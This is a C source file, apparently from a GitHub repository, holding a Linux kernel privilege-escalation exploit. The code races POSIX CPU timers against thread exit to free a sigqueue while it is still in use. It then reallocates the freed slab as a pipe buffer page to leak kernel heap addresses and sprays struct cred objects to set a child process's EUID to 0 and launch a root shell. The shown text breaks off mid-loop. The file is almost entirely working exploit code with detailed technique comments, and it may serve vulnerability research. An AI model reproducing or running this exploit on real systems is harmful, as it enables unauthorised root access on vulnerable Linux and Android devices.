-
Notifications
You must be signed in to change notification settings - Fork 45
Expand file tree
/
Copy pathexploit.c
More file actions
1474 lines (1248 loc) · 63.1 KB
/
exploit.c
File metadata and controls
1474 lines (1248 loc) · 63.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <sys/signalfd.h>
#include <poll.h>
#include <errno.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/mman.h>
#include <linux/futex.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define PAGE_SIZE 0x1000uLL
// For winning the races and extending
// the race windows
#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define SYSCALL_LOOP_TIMES_MAX 300
#define EPOLL_COUNT 500
#define SFD_DUP_COUNT 100
// For synchronization between parent and child
#define SUCCESS_CHAR 's'
#define FAIL_CHAR 'f'
#define SUCCESS_STR "s"
#define FAIL_STR "f"
// The following variables are target dependent. Some benchmarking can
// be done from userland beforehand so that these variables aren't
// needed, but just for this exploit, I manually set them to values
// that work for me. You'll have to figure them out yourself.
#define PARENT_SETTIME_DELAY_US 22000
#define PARENT_SETTIME_DELAY_US_DELTA 50
#define CPU_USAGE_THRESHOLD 22000
/* Global variables for exploit setup START */
// Thread synchronization in child process
pthread_barrier_t barrier;
// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t race_thread;
int exploit_child_to_parent[2];
int exploit_parent_to_child[2];
int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window
int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later.
// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 0;
int race_retry_count = 0; // For debugging purposes
pid_t exploit_child_pid, exploit_parent_pid;
// BIG NOTE: The very first timer created by a process actually gets timer ID 0,
// so checking for NULL here is not good enough to figure out whether a timer was
// allocated or not.
//
// Instead, set these to -1, and check for -1 later.
timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handlers
/* Global variables for exploit setup END */
/* Global variables for cross-cache START */
// `sigqueue_cachep` related constants.
#define SIGQUEUE_objs_per_slab 51
#define SIGQUEUE_cpu_partial 30
#define SIGQUEUE_slab_count 33
#define SIGQUEUE_obj_size 80
// `struct sigqueue` related constants.
#define SIGQUEUE_PREALLOC 1
#define SIGQUEUE_list_next_offset 0
#define SIGQUEUE_list_prev_offset 8
#define SIGQUEUE_info_si_signo_offset (24+0)
#define SIGQUEUE_flags_offset 16
#define SIGQUEUE_user_offset 72
// `cred_jar` and `struct cred` related constants.
#define CRED_JAR_slab_size 192
#define CRED_JAR_euid_offset 20
#define CRED_JAR_egid_offset 24
// This list holds the timers used for cross-caching (both times).
timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab];
/* Global variables for cross-cache END */
/* Global variables for second stage START */
#define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with
int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue?
pid_t buggy_pid = 0; // Parent / child process PID based on above
/* Global variables for second stage END */
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
static inline long long ts_to_ns(const struct timespec *ts) {
return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}
// Helper function to fully drain a signalfd.
//
// WARNING!!!! THIS FUNCTION IS AI GENERATED!!! DO NOT USE XD
int drain_signalfd(int sfd) {
int sig_count = 0;
for (;;) {
struct signalfd_siginfo si;
ssize_t n = read(sfd, &si, sizeof(si));
if (n > 0) { sig_count++; continue; } // drained some; keep going
if (n == -1 && errno == EAGAIN) break; // fully drained
if (n == -1 && errno == EINTR) continue; // interrupted; retry
}
return sig_count;
}
static inline size_t rdtsc_begin(void)
{
#if defined(ARM64)
return rdtsc();
#else
size_t a, d;
asm volatile ("mfence");
asm volatile ("rdtsc" : "=a" (a), "=d" (d));
a = (d<<32) | a;
asm volatile ("lfence");
return a;
#endif
}
static inline size_t rdtsc_end(void)
{
#if defined(ARM64)
return rdtsc();
#else
size_t a, d;
asm volatile ("lfence");
asm volatile ("rdtsc" : "=a" (a), "=d" (d));
a = (d<<32) | a;
asm volatile ("mfence");
return a;
#endif
}
// This function measures the average CPU time consumption of the `getpid()` syscall.
//
// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine.
//
// Can also actually return 0 if some weird scheduler behavior occurs and causes
// the `total_nsec` to overflow, so ensure to check for that when calling it.
//
// Also, very important to be pinned to one CPU before running this!
long int getpid_cpu_usage() {
size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof(size_t[2]));
for (int i = 0; i < NUM_SAMPLES; i++) {
times[i][0] = rdtsc_begin();
syscall(__NR_getpid);
times[i][1] = rdtsc_end();
}
size_t total_nsec = 0;
for (int i = 0; i < NUM_SAMPLES; i++) {
total_nsec += times[i][1] - times[i][0];
}
free(times);
long int getpid_avg = total_nsec / NUM_SAMPLES;
return total_nsec / NUM_SAMPLES;
}
// Helper function to read from the reallocated pipe buffer data page.
//
// Reads `size` bytes at offset `offset` out of the pipe and return it in `buf`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - The pipe is assumed to be readable (i.e write_pipe() was
// already called before this).
void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) {
size_t ret = 0;
if (size > PAGE_SIZE) {
printf("read_pipe: size too big\n");
SYSCHK(-1);
}
// Read up to offset first, then read size bytes
ret = SYSCHK(read(pfds[0], buf, offset));
if (ret != offset) {
printf("read_pipe: offset read failed, offset %ld read %ld\n", offset, ret);
SYSCHK(-1);
}
SYSCHK(read(pfds[0], buf, size));
}
// Helper function to read from the reallocated pipe buffer data page.
//
// Writes `size` bytes out of `buf` into the pipe at offset `offset`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - This will clobber all data before offset.
// TODO:
void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) {
size_t ret = 0;
if (size > PAGE_SIZE) {
printf("write_pipe: size too big\n");
SYSCHK(-1);
}
// Write up to offset first, then write the data
char zero_buf[offset];
memset(zero_buf, 0, offset);
ret = SYSCHK(write(pfds[1], zero_buf, offset));
if (ret != offset) {
printf("write_pipe: offset write failed, offset %ld wrote %ld\n", offset, ret);
SYSCHK(-1);
}
ret = SYSCHK(write(pfds[1], buf, size));
if (ret != size) {
printf("write_pipe: size write failed, size %ld wrote %ld\n", size, ret);
SYSCHK(-1);
}
}
// This function pre-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_preallocs() {
// ---------------------------------------------------------------------------------
//
// NOTE: On a real android device, a bunch of sigqueues should be allocated first
// so that all slab pages from per cpu partial lists, per node partial lists, etc
// are used up. This can be done by just spamming real-time signals to some process
// that's blocking them.
//
// I won't be doing that here, just going to assume this is being ran in QEMU on a
// clean setup where the sigqueue cache's slab pages will not be on any per-cpu
// or per-node partial lists.
//
// ---------------------------------------------------------------------------------
//
// Goal: get our UAF timer in the middle of slab 3.
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// Allocate full slabs 1 and 2.
for (int i = 0; i < 2; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
// Allocate 25 objects in slab 3
for (int i = 0; i < 25; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Next allocation will be the sigqueue whose slab will be cross-cached.
}
// This function post-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_postallocs() {
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate
// it plus the remaining 25 objects in that slab now.
//
// You can use this special value with a kernel patch to figure out where it's allocated.
// This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If
// it doesn't, there's a bug in this exploit!
// cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL;
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25]));
cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set
// Allocate the remaining 25 objects in slab 3.
for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Allocate sigqueues for the remaining slabs.
for (int i = 3; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
}
// This function frees the slab 3 page back to the page allocator by very
// carefully freeing sigqueues in the `cross_cache_timers` list.
void free_crosscache_sigqueues() {
// Now, the target sigqueue should be in the middle of slab 3.
//
// Strategically free sigqueues to fill up the per-cpu partial list, but also
// ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab.
//
// Start by freeing the first and last object in slab 1.
SYSCHK(timer_delete(cross_cache_timers[0][0]));
SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1]));
// Now, free the first, and then objects 26 through 51 in slab 2.
SYSCHK(timer_delete(cross_cache_timers[1][0]));
for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[1][i]));
}
// Free all objects in slab 3
for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[2][i]));
}
// Free objects 1 through 25 in slab 4
for (int i = 0; i < 25; i++) {
SYSCHK(timer_delete(cross_cache_timers[3][i]));
}
// For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj
for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) {
SYSCHK(timer_delete(cross_cache_timers[i][0]));
SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1]));
}
// Now, freeing one object from the `cpu_partial+1`th slab should trigger
// `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to
// the page allocator.
//
// Free first and last sigqueue here just in case the first one is in the
// slab overlapped with the previous index.
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0]));
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1]));
}
void cleanup_crosscache_sigqueues() {
// In this case, we can just timer_delete() every single timer without
// checking for errors. If they exist, they will be deleted. Otherwise,
// we'll see an error.
for (int i = 0; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
timer_delete(cross_cache_timers[i][j]);
}
}
}
// This is the function responsible for triggering `handle_posix_cpu_timers()`.
void race_func(void) {
// Pin to same CPU as the `free_func()` thread. This is the first cross-cache
// CPU.
pin_on_cpu(3);
// For the race condition trigger
struct sigevent race_evt = {0};
race_evt.sigev_notify = SIGEV_SIGNAL;
race_evt.sigev_signo = SIGUSR1;
// For the UAF timer
struct sigevent uaf_evt = {0};
uaf_evt.sigev_notify = SIGEV_SIGNAL;
uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now
// uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer
prctl(PR_SET_NAME, "RACER");
// prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this
// Send this thread's TID to the parent process, so the parent can attach to us.
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1
// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
long int getpid_avg = 0;
// `getpid_cpu_usage()` can technically return 0, it's very rare but
// if it does, just recalculate.
while (getpid_avg == 0) {
getpid_avg = getpid_cpu_usage();
}
// Wait for parent to attach and continue us.
pthread_barrier_wait(&barrier); // barrier 1
// Create the UAF timer on the first cross-cache CPU.
//
// NOTE: This must be the last timer created on this CPU's active slab! Because we will
// free it and re-allocate over it in `free_func()`.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer));
// Switch the pinned CPU after creating the UAF timer. This is important because
// `free_func()` must be able to run concurrently to this, and we also don't want to
// touch the active CPU slab of the cross-cache CPU!
pin_on_cpu(2);
// Create the remaining stall timers for extending the race window
for (int i = 0; i < NUM_TIMERS; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i]));
}
// Wait for the main thread to arm the timers. This is to make sure
// this thread does not use CPU time to arm the timers.
pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread
pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers
// Waste just the right amount of CPU time now without firing any of the timers.
//
// The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time,
// and then adding a threshold amount of times on top of that will ensure that the timers
// fire BEFORE `do_exit()` is called.
//
// Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the
// amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes
// up the parent exploit process.
//
// Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often
// the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes,
// but not every time.
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) {
syscall(__NR_getpid);
}
// This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt
// to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent
// exploit process that called `waitpid()` on us.
return;
}
void free_func(void) {
pin_on_cpu(3);
prctl(PR_SET_NAME, "FREE_FUNC");
// Set up a poll for SIGUSR1. As soon as we receive it, we know
// we're in the race window.
struct pollfd pfd = {
.fd = sigusr1_sfds[0],
.events = POLLIN
};
// Poll for SIGUSR1.
for (;;) {
int ret = poll(&pfd, 1, 0);
// Got SIGUSR1 from the first stall timer, in race window now.
if (pfd.revents & POLLIN) {
// Free the UAF timer now on CPU 3 (first cross-cache CPU).
SYSCHK(timer_delete(uaf_timer));
// Immediately switch pinned CPU to 0 and wake up the parent exploit process.
//
// Parent exploit process will already have switched to CPU 3, so it can wake
// up immediately and re-allocate the UAF timer.
//
// Important to reallocate in the parent process, so that the sighand locks are
// different.
pin_on_cpu(0);
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS
// Use the barrier to let the child process continue now and handle
// the SIGUSR1 signals.
pthread_barrier_wait(&barrier); // barrier 4
break;
}
// Spurious wake-up check
if (ret < 0 && errno == EINTR)
continue;
// Some unknown error occurred, pause to debug
if (ret < 0) {
perror("free_func poll");
getchar();
break;
}
}
}
// Stage 2 starts after:
//
// 1. The UAF sigqueue is freed.
// 2. We still have a handle to in either the parent or child's pending list.
// 3. The UAF sigqueue's pointers should point back to itself, making it
// non-dequeueable by default.
void second_stage_exploit() {
struct signalfd_siginfo si;
char m;
// Create a signalfds for all three signals we need to dequeue later.
sigset_t mask;
sigemptyset(&mask);
sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue
int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue
int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr
int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
// Prepare the buffer used by the reallocated pipe buffer data page.
char buf[PAGE_SIZE];
memset(buf, 0, PAGE_SIZE);
// Just double confirm we are pinned to the right cross-cache CPU.
pin_on_cpu(3);
printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n");
// Allocate the rest of the sigqueues for cross-cache
sigqueue_crosscache_postallocs();
// Allocate a pipe for the pipe buffer data page later, and make it
// non-blocking for error checking too.
int realloc_pipefds[2];
SYSCHK(pipe(realloc_pipefds));
// Read end non-blocking
int flags = fcntl(realloc_pipefds[0], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK));
// Write end non-blocking
flags = fcntl(realloc_pipefds[1], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK));
// Now free the UAF sigqueue's page back to the page allocator.
free_crosscache_sigqueues();
// Realloc UAF sigqueue as a pipe buffer page immediately after it's freed.
// This is done by writing to the pipe.
SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE));
printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n");
printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n");
// We will be cross-caching again very soon, so free all other cross-cache sigqueues.
// NOTE: do this on the same CPU as the first cross-cache.
cleanup_crosscache_sigqueues();
printf("\t[+] Preparing task pending list for heap leaks\n");
// Switch CPUs to start on a clean slate for the second cross-cache.
pin_on_cpu(2);
// Do the preallocs same as before.
sigqueue_crosscache_preallocs();
// Send a new signal to the process to fill in the UAF sigqueue's next pointer
// Use `tkill()` as that uses the task's pending list. `kill()` uses the
// shared pending list instead.
//
// This sigqueue is allocated after the preallocs.
SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1));
// Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU.
//
// This is because this signal was prepared on a non-cross-cache CPU in the first
// place, and we aren't using it in the cross-cache, so in order to not mess with
// the cross-cache, we have to free it on a different CPU.
pin_on_cpu(1);
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
// Dequeueing this signal will put the pointer of our task struct's pending list
// into the ->prev pointer of the UAF sigqueue.
SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
} else {
// Child will dequeue the signal for us. Wait for it to finish.
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 3
}
// Now switch back to the second cross-cache CPU
pin_on_cpu(2);
// Scan the pipe buffer data page for the `next` and `prev` pointer to store them.
// Everything will be zeroes except those pointers at this point in time.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf);
size_t other_sigqueue_addr = 0;
size_t task_pending_list_addr = 0;
size_t uaf_sigqueue_offset = 0;
// Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset.
for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) {
other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset)));
if (other_sigqueue_addr) {
uaf_sigqueue_offset = i;
task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset)));
printf("\t[+] Heap leaks:\n");
printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset);
printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr);
printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr);
break;
}
}
// Set up the UAF sigqueue so we can leak it's own address now.
// Key points are:
//
// 1. Setting `next` and `prev` both to the other sigqueue's address ensures
// that the UAF sigqueue's pointer stays in the task pending list.
// 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not
// be dequeued.
// 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway.
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC; // flags
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2; // info->si_code
write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf);
// Now drain the UAF sigqueue's signal to write it's own pointers back into itself.
// This will happen because of the `list_del_init()` in `collect_signal()`.
//
// NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point
// back to the other sigqueue's address. However, the task pending list's
// `prev` pointer still points to other sigqueue's address. Basically,
// when we free the other sigqueue soon, the task pending list's `prev`
// pointer won't be updated.
//
// All this means is that we can't append anymore signals to this task's pending
// list after this point.
//
// NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
// SIGRTMIN+1 stays.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5
}
// Read the UAF sigqueue's own address now through the pipe buffer
size_t uaf_sigqueue_addr = 0;
read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf);
uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset));
printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr);
// Now free the other sigqueue back to the freelist of it's slab page.
//
// Since our UAF sigqueue is at the head of the pending list, set it's next pointer
// to point to the other sigqueue so the list can be traversed to it.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7
}
printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n");
// Now, second cross-cache post allocs. The target sigqueue is the
// other sigqueue, which was just freed.
sigqueue_crosscache_postallocs();
// Before freeing the other sigqueue's slab page back to the page allocator,
// fork NUM_CRED_PROCS processes. Do this on a non-cross-cache CPU.
//
// This is preparing for the `struct cred` spray later.
pin_on_cpu(1);
printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS);
int cred_parent_pfds[2];
int cred_child_pfds[2];
SYSCHK(pipe(cred_parent_pfds));
SYSCHK(pipe(cred_child_pfds));
for (int i = 0; i < NUM_CRED_PROCS; i++) {
pid_t pid = SYSCHK(fork());
if (!pid) {
// child process
SYSCHK(close(cred_parent_pfds[1]));
SYSCHK(close(cred_child_pfds[0]));
// Wait for the parent to wake us up to call `setresuid(-1,-1,-1)
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Pin on same CPU as the cross-cache CPU before calling
// `setresuid(-1,-1,-1)`. This allocates one cred struct.
pin_on_cpu(2);
SYSCHK(setresuid(-1,-1,-1));
// Reset CPU and let the parent know we finished.
pin_on_cpu(1);
SYSCHK(write(cred_child_pfds[1], &m, 1));
// Wait for the parent to potentially decrement our EUID to 0.
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Check our EUID
uid_t euid = geteuid();
// If we have root privs now, just spawn a shell
if (euid == 0) {
printf("\t[+] Found child process with euid=%d!\n", euid);
printf("\t[+] Spawning root shell...\n");
printf("\n");
printf("\n");
printf("\n");
// Must set our UID and GID to 0 as well. "/bin/sh" seems to do a
// `setuid(getuid())`, and since the we only changed our EUID,
// that resets our privs here.
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/sh");
} else {
// Parent won't wake us up anymore, wake up the parent and
// block forever
SYSCHK(write(cred_child_pfds[1], &m, 1));
SYSCHK(read(cred_parent_pfds[0], &m, 1));
}
}
}
// Continuing in the parent process now.
SYSCHK(close(cred_parent_pfds[0]));
SYSCHK(close(cred_child_pfds[1]));
// For later, pick the second cred object in the other sigqueue's slab arbitrarily.
size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size;
printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr);
// Now free the other sigqueue's slab page, make sure to switch CPUs back to the
// second cross-cache CPU!
pin_on_cpu(2);
free_crosscache_sigqueues();
// Wake up each child process to call `setresuid(-1,-1,-1)`
//
// NOTE: Writing to the pipe will allocate new pages. Switch
// to a non-cross-cache CPU to do this.
pin_on_cpu(1);
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
